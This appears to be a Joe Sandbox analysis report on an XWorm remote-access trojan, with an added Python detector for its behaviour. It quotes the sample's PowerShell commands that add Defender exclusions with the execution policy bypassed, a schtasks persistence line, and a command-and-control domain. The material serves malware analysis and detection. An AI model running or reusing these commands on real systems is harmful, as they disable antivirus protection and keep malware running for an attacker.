            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7240
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2226
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8130
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe TID: 6688Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep count: 7240 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep count: 2226 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep count: 8130 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep count: 1456 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Roaming\SYSTEM TID: 6656Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\SYSTEM TID: 6188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\SYSTEMLast function: Thread delayed
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
            Source: 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B674000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWil%SystemRoot%\system32\mswsock.dllFormat="Hashed"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeQueries volume information: C:\Users\user\Desktop\72OWK7wBVH.exe VolumeInformation
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\SYSTEM | Queries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B674000.00000004.00000020.00020000.00000000.sdmp, 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B6BB000.00000004.00000020.00020000.00000000.sdmp, 72OWK7wBVH.exe, 00000000.00000002.2931316903.0000000000916000.00000004.00000020.00020000.00000000.sdmp, 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B620000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\72OWK7wBVH.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
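The three process-creation lines above (two Add-MpPreference exclusions launched with -ExecutionPolicy Bypass, and a schtasks entry that re-runs the dropped C:\Users\user\AppData\Roaming\SYSTEM every minute at the highest run level) are the events a detection engineer would key on. The following is an added example and is not part of the Joe Sandbox report or of the sample's code: Python detection logic that tokenises process-creation command lines, flags each of those behaviours, and then correlates them per parent process so that an exclusion covering the same path a scheduled task executes is reported as one combined finding. The sample events are constructed from the command lines in the report; the fourth event (parent stage2.exe, -EncodedCommand form) is a hypothetical addition showing the same cmdlet hidden behind base64, which the report's plain-text command lines do not use.

```python
"""Added example, not part of the Joe Sandbox report: detection logic for the process-creation
events listed above (Add-MpPreference exclusions, -ExecutionPolicy Bypass, a one-minute
highest-run-level schtasks entry pointing at a user-writable path), correlated per parent."""
import base64
import re

USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
ENC_FLAGS = {"e", "ec", "enc", "encodedcommand"}        # -EncodedCommand spellings
POLICY_FLAGS = {"ep", "ex", "exec", "executionpolicy"}  # -ExecutionPolicy spellings
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Assumption (not in the report): the same cmdlet hidden behind -EncodedCommand (UTF-16LE + base64).
ENCODED = base64.b64encode("Add-MpPreference -ExclusionExtension '.exe'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [  # constructed from the three process-creation lines in the report
    {"parent": r"C:\Users\user\Desktop\72OWK7wBVH.exe", "image": PS, "cmdline":
     r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'"""},
    {"parent": r"C:\Users\user\Desktop\72OWK7wBVH.exe", "image": PS, "cmdline":
     r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'"""},
    {"parent": r"C:\Users\user\Desktop\72OWK7wBVH.exe", "image": r"C:\Windows\System32\schtasks.exe", "cmdline":
     r'''"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"'''},
    {"parent": r"C:\Users\user\AppData\Local\Temp\stage2.exe", "image": PS,  # hypothetical parent
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
]

def split_cmdline(cmdline):
    """Split on whitespace, honouring "..." and '...'; quotes dropped, backslashes kept verbatim."""
    tokens, cur, quote = [], [], None
    for ch in cmdline:
        if quote and ch == quote:
            quote = None
        elif quote or not (ch.isspace() or ch in "\"'"):
            cur.append(ch)
        elif ch in "\"'":
            quote = ch
        elif cur:
            tokens.append("".join(cur))
            cur = []
    return tokens + ["".join(cur)] if cur else tokens

def decode_encoded_command(tokens):
    for i in range(len(tokens) - 1):  # -e/-ec/-enc/-EncodedCommand <base64 of a UTF-16LE script>
        if tokens[i].lower().lstrip("-/") in ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def analyse_powershell(tokens):
    findings, script = [], tokens
    decoded = decode_encoded_command(tokens)
    if decoded is not None:  # inspect the decoded script, not just the outer command line
        findings.append(("encoded_command", decoded))
        script = split_cmdline(decoded)
    low = [t.lower() for t in tokens]
    for i in range(len(low) - 1):
        if low[i].lstrip("-/") in POLICY_FLAGS and low[i + 1] in ("bypass", "unrestricted"):
            findings.append(("exec_policy", tokens[i + 1]))
    slow = [t.lower() for t in script]
    if "add-mppreference" in slow or "set-mppreference" in slow:
        for i in range(len(slow) - 1):
            if slow[i].startswith("-exclusion"):  # -ExclusionPath / -ExclusionProcess / -ExclusionExtension
                findings.append(("defender_exclusion_" + slow[i][len("-exclusion"):], script[i + 1]))
    return findings

def analyse_schtasks(tokens):
    low = [t.lower() for t in tokens]
    if "/create" not in low:
        return []
    opts = {low[i]: tokens[i + 1] for i in range(len(low) - 1) if low[i].startswith("/")}
    target, findings = opts.get("/tr", ""), []
    every = int(opts["/mo"]) if opts.get("/mo", "").isdigit() else 0
    if opts.get("/sc", "").lower() == "minute" and 0 < every <= 5:
        findings.append(("schtask_high_frequency", f"every {every} min -> {target}"))
    if opts.get("/rl", "").lower() == "highest":
        findings.append(("schtask_highest_rl", target))
    if USER_WRITABLE.search(target):
        findings.append(("schtask_user_writable_target", target))
    return findings

def analyse_event(event):
    tokens, image = split_cmdline(event["cmdline"]), event["image"].lower()
    if image.endswith(("powershell.exe", "pwsh.exe")):
        return analyse_powershell(tokens)
    return analyse_schtasks(tokens) if image.endswith("schtasks.exe") else []

def correlate(events):
    """Findings per parent; adds a hit when an exclusion covers a task target from the same parent."""
    report = {}
    for ev in events:
        for f in analyse_event(ev):
            report.setdefault(ev["parent"], []).append(f)
    for findings in report.values():
        excluded = [d.lower() for k, d in findings if k == "defender_exclusion_path"]
        targets = [d for k, d in findings if k == "schtask_user_writable_target"]
        for t in targets:
            if any(t.lower().startswith(ex) for ex in excluded):
                findings.append(("excluded_persistence_target", t))
    return report
```

In production the records would come from Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled. Each individual finding (an exclusion, a bypass, a one-minute task) has benign uses in administration scripts; the combination correlate() reports for the sample's parent, an exclusion path that is also the target of a highest-run-level task in a user-writable directory, is the one worth alerting on without further triage.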

Stealing of Sensitive Information

Source: Yara match | File source: 72OWK7wBVH.exe, type: SAMPLE
Source: Yara match | File source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 72OWK7wBVH.exe PID: 6776, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 72OWK7wBVH.exe, type: SAMPLE
Source: Yara match | File source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 72OWK7wBVH.exe PID: 6776, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED
MITRE ATT&CK Matrix (techniques per tactic, in the order the report's matrix lists them; a number in parentheses is the count shown beside that technique)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation (11), Scheduled Task/Job (1), PowerShell (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Scheduled Task/Job (1), Registry Run Keys / Startup Folder (2), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (2), DLL Side-Loading (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (11), Disable or Modify Tools (11), Virtualization/Sandbox Evasion (131), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (2), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (221), Process Discovery (1), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (13), Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (11), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (11), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph (ID: 1575210; sample: 72OWK7wBVH.exe; start date: 14/12/2024; architecture: WINDOWS; score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
DNS/IP: if-sensors.gl.at.ply.gg resolves to 147.185.221.24 (SALSGIVERUS, United States); ports 24891, 49737, 49790

Process tree:
  72OWK7wBVH.exe (started)
    Dropped file: C:\Users\user\AppData\Roaming\SYSTEM, PE32
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 2 other signatures
    powershell.exe (started; signature: Loading BitLocker PowerShell Module) -> conhost.exe
    powershell.exe (started) -> conhost.exe
    powershell.exe (started) -> conhost.exe
    2 other processes -> conhost.exe, conhost.exe
  SYSTEM (started; three instances)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

Source | Detection | Scanner | Label
72OWK7wBVH.exe | 76% | ReversingLabs | Win32.Exploit.Xworm
72OWK7wBVH.exe | 100% | Avira | TR/Spy.Gen
72OWK7wBVH.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\SYSTEM | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\SYSTEM | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\SYSTEM | 76% | ReversingLabs | Win32.Exploit.Xworm

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
if-sensors.gl.at.ply.gg | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
if-sensors.gl.at.ply.gg | 147.185.221.24 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
if-sensors.gl.at.ply.gg | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000001.00000002.1779448718.0000020ADC753000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.c | powershell.exe, 0000000B.00000002.2226725098.00000167381D5000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 72OWK7wBVH.exe, 00000000.00000002.2942146763.0000000002861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micros | powershell.exe, 00000001.00000002.1779023894.0000020ADC582000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034970056.000002259C890000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted-IP map legend (map image omitted): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.24 | if-sensors.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1575210
                                            Start date and time:2024-12-14 18:53:05 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 24s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:72OWK7wBVH.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@19/21@1/1
                                            EGA Information:
                                            • Successful, ratio: 12.5%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 69
                                            • Number of non-executed functions: 8
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63, 172.202.163.200, 173.222.162.32
                                            • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target SYSTEM, PID 4556 because it is empty
                                            • Execution Graph export aborted for target SYSTEM, PID 5480 because it is empty
                                            • Execution Graph export aborted for target SYSTEM, PID 5928 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6564 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6900 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 744 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 8 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: 72OWK7wBVH.exe
Time | Type | Description
12:54:01 | API Interceptor | 56x Sleep call for process: powershell.exe modified
12:54:55 | API Interceptor | 166337x Sleep call for process: 72OWK7wBVH.exe modified
17:54:55 | Task Scheduler | Run new task: SYSTEM path: C:\Users\user\AppData\Roaming\SYSTEM
17:54:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk
Match: 147.185.221.24
Associated Sample Name / URL | Detection | Threat Name
aZDwfEKorn.exe | malicious | XWorm
HdTSntLSMB.exe | malicious | XWorm
file.exe | malicious | XWorm
file.exe | malicious | XWorm
NhoqAfkhHL.bat | malicious | Unknown
a4lIk1Jrla.exe | malicious | Njrat, RevengeRAT
W6s1vzcRdj.exe | malicious | XWorm
u7e3vb5dfk.exe | malicious | XWorm
aOi4JyF92S.exe | malicious | XWorm
PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm
                                                                No context
Match: SALSGIVERUS
Associated Sample Name / URL | Detection | Threat Name | Context
aZDwfEKorn.exe | malicious | XWorm | 147.185.221.24
HdTSntLSMB.exe | malicious | XWorm | 147.185.221.24
7laJ4zKd8O.exe | malicious | XWorm | 147.185.221.18
file.exe | malicious | XWorm | 147.185.221.24
testingg.exe | malicious | Njrat | 147.185.221.19
Bloxflip Predictor.exe | malicious | Njrat | 147.185.221.224
system404.exe | malicious | Metasploit | 147.185.221.19
Discord.exe | malicious | AsyncRAT | 147.185.221.18
CVmkXJ7e0a.exe | malicious | SheetRat | 147.185.221.22
file.exe | malicious | XWorm | 147.185.221.24
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\AppData\Roaming\SYSTEM
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):654
                                                                Entropy (8bit):5.380476433908377
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
